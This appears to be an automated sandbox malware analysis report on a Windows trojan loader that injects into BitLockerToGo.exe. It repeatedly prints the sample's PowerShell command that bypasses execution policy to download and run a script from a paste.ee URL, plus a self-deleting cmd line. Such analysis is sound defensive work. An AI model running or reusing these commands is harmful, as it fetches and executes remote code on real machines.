Edit tour

Windows Analysis Report
EwKKdCrEDu.exe

Overview

General Information

Sample name:	EwKKdCrEDu.exe renamed because original name is a hash value
Original sample name:	2dc8cdf825e23ff1df1ad11b3a6f1973.exe
Analysis ID:	1543863
MD5:	2dc8cdf825e23ff1df1ad11b3a6f1973
SHA1:	82af57e0e6d7cf944148d3a16d7c8ca94fa982f8
SHA256:	5d215747817125559e1a2d934c301ab466cbc956a6839c8a45f8b02b84b184d0
Tags:	32exetrojan
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Powershell download and execute

AI detected suspicious sample

Allocates memory in foreign processes

Bypasses PowerShell execution policy

Connects to a pastebin service (likely for C&C)

Injects a PE file into a foreign processes

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Writes to foreign memory regions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

EwKKdCrEDu.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\EwKKdCrEDu.exe" MD5: 2DC8CDF825E23FF1DF1AD11B3A6F1973)

BitLockerToGo.exe (PID: 3116 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

powershell.exe (PID: 6692 cmdline: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6636 cmdline: cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1671695054.0000000001E40000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.1671695054.0000000002088000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
Process Memory Space: powershell.exe PID: 6692	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_6692.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3116, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , ProcessId: 6692, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3116, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , ProcessId: 6692, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3116, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , ProcessId: 6692, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3116, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , ProcessId: 6692, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3116, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , ProcessId: 6692, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: EwKKdCrEDu.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: EwKKdCrEDu.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2

Source: EwKKdCrEDu.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1691529805.0000000006BF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1691225462.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\Desktop\projects\loader\Release\Loader.pdb source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp, EwKKdCrEDu.exe, 00000000.00000002.1670983008.0000000001D34000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 00000004.00000002.1691529805.0000000006C51000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_006EC481 FindFirstFileExW,

2_2_006EC481

Networking

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: GET /d/7BWJv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: paste.eeConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /d/7BWJv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: paste.eeConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: paste.ee

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 14:16:36 GMTContent-Length: 0Connection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UStKtoUB%2BMn6VxYd6LAGk1XSBFZccNRFH%2F%2F0%2BRkciZyvLTVzmdhTZsKMaAYaMJJXp%2FETulPobVU%2BrdHglxWwYdtXDGFlCmkgTWBrD5VdVLznzv6mByPejcM1iw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d9b8b691fd32ca2-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1108&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2815&recv_bytes=774&delivery_rate=2562831&cwnd=251&unsent_bytes=0&cid=b691612755f26c0e&ts=493&x=0"

Source: EwKKdCrEDu.exe, program.js.0.dr	String found in binary or memory: http://json-schema.org/draft-07/schema
Source: program.js.0.dr	String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: EwKKdCrEDu.exe, program.js.0.dr	String found in binary or memory: http://json-schema.org/schema
Source: powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1687092302.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1691529805.0000000006BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coD
Source: powershell.exe, 00000004.00000002.1687092302.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: EwKKdCrEDu.exe, program.js.0.dr	String found in binary or memory: https://aws.amazon.com
Source: powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: EwKKdCrEDu.exe, program.js.0.dr	String found in binary or memory: https://github.com/aws/jsii
Source: EwKKdCrEDu.exe, program.js.0.dr	String found in binary or memory: https://github.com/aws/jsii.git
Source: EwKKdCrEDu.exe, program.js.0.dr	String found in binary or memory: https://github.com/aws/jsii/issues
Source: program.js.0.dr	String found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
Source: powershell.exe, 00000004.00000002.1687092302.000000000498D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1690275094.0000000005716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000004.00000002.1687092302.00000000048FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: powershell.exe, 00000004.00000002.1687092302.00000000048FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1687092302.0000000004806000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/7BWJv
Source: program.js.0.dr	String found in binary or memory: https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1671695054.0000000001E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1671695054.0000000002088000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_006F503D	2_2_006F503D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_006E75DF	2_2_006E75DF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_006EFE00	2_2_006EFE00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_006E22CA	2_2_006E22CA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_006F02AB	2_2_006F02AB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_006E729D	2_2_006E729D

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: String function: 006E2140 appears 35 times

Source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs EwKKdCrEDu.exe

Source: EwKKdCrEDu.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1671695054.0000000001E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1671695054.0000000002088000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal96.troj.evad.winEXE@9/7@1/1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03

Source: C:\Users\user\Desktop\EwKKdCrEDu.exe

File created: C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992

Jump to behavior

Source: EwKKdCrEDu.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\EwKKdCrEDu.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: EwKKdCrEDu.exe

ReversingLabs: Detection: 21%

Source: EwKKdCrEDu.exe	String found in binary or memory: depgithub.com/hashicorp/go-azure-helpersv0.66.2h1:+Pzuo7pdKl0hBXXr5ymmhs4Q40tHAo2nAvHq4WgSjx8=
Source: EwKKdCrEDu.exe	String found in binary or memory: github.com/aws/jsii-runtime-go@v1.103.1/internal/kernel/load.go
Source: EwKKdCrEDu.exe	String found in binary or memory: net/addrselect.go
Source: EwKKdCrEDu.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go

Source: C:\Users\user\Desktop\EwKKdCrEDu.exe

File read: C:\Users\user\Desktop\EwKKdCrEDu.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\EwKKdCrEDu.exe "C:\Users\user\Desktop\EwKKdCrEDu.exe"
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
